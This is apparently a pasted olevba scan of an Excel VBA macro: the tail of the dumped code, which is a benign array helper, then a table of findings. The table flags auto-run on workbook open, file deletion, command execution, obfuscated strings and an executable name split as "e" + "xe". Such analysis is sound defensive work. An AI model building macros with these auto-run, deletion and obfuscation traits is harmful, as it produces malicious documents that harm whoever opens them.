  778. End Function
  779. Function AryIsEmpty(ary) As Boolean
  780.  On Error GoTo oops
  781.  Dim x As Long
  782.  x = UBound(ary)
  783.  AryIsEmpty = False
  784.  Exit Function
  785. oops: AryIsEmpty = True
  786. End Function
  787.  
  788.  
  789.  
  790.  
  791. +------------+----------------------+-----------------------------------------+
  792. | Type       | Keyword              | Description                             |
  793. +------------+----------------------+-----------------------------------------+
  794. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  795. | Suspicious | Kill                 | May delete a file                       |
  796. | Suspicious | Open                 | May open a file                         |
  797. | Suspicious | vbNormal             | May run an executable file or a system  |
  798. |            |                      | command                                 |
  799. | Suspicious | MkDir                | May create a directory                  |
  800. | Suspicious | Binary               | May read or write a binary file (if     |
  801. |            |                      | combined with Open)                     |
  802. | Suspicious | CreateObject         | May create an OLE object                |
  803. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  804. |            |                      | strings                                 |
  805. | Suspicious | SaveToFile           | May create a text file                  |
  806. | Suspicious | Write                | May write to a file (if combined with   |
  807. |            |                      | Open)                                   |
  808. | Suspicious | Output               | May write to a file (if combined with   |
  809. |            |                      | Open)                                   |
  810. | Suspicious | Print #              | May write to a file (if combined with   |
  811. |            |                      | Open)                                   |
  812. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  813. |            |                      | be used to obfuscate strings (option    |
  814. |            |                      | --decode to see all)                    |
  815. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  816. |            |                      | may be used to obfuscate strings        |
  817. |            |                      | (option --decode to see all)            |
  818. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  819. |            | Strings              | may be used to obfuscate strings        |
  820. |            |                      | (option --decode to see all)            |
  821. | IOC        | SciLexer.dll         | Executable file name                    |
  822. | VBA string | Provider=Microsoft.J | "Provider=Microsoft.Jet.OLEDB.4.0;" &   |
  823. |            | et.OLEDB.4.0;Data    | "Data Source=\"                         |
  824. |            | Source=\             |                                         |
  825. | VBA string | exe                  | "e" + "xe"                              |
  826. +------------+----------------------+-----------------------------------------+
Add Comment
Please, Sign In to add comment